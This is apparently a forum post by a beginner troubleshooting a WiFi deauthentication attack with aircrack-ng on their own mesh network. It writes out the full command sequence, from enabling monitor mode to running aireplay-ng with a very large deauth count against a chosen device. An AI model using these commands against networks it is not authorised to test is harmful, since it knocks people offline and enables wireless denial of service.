So im new to this, started just yesterday actually. If this is breaking any forum rules i apologize, this looked like the correct place for tool questions, and a search didnt yeild much. But my current issue is when i try to deauth any device (Ive tried multiple devices at this point) i can not get it to go through. it sends packets but everything still receives internet, Im on a mesh dual band wifi system. I wrote down every command i use from boot to hopefully figure out what im doing wrong, my current process is as follows
sudo ifconfig wlan0 down
sudo airmon-ng check kill
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo airodump-ng --band abg wlan0
sudo airodump-ng --band abg --essid (My wifi name)
i then find the station i want to disconnect then the bssid its attached to
sudo airodump-ng --band abg --bssid (Bssid device was attached to) --channel 157 wlan0
while that is running i then try to do a deauth with
sudo aireplay-ng --deauth 100000000 -a (Wifi MAC) -c (Device MAC) wlan0 -D
When i run the aireplay-ng i still have internet on my host computer, the deauth message says its sending packets to the correct MAC with a 0|34 ACKs (Not always 34 but the first number is always 0)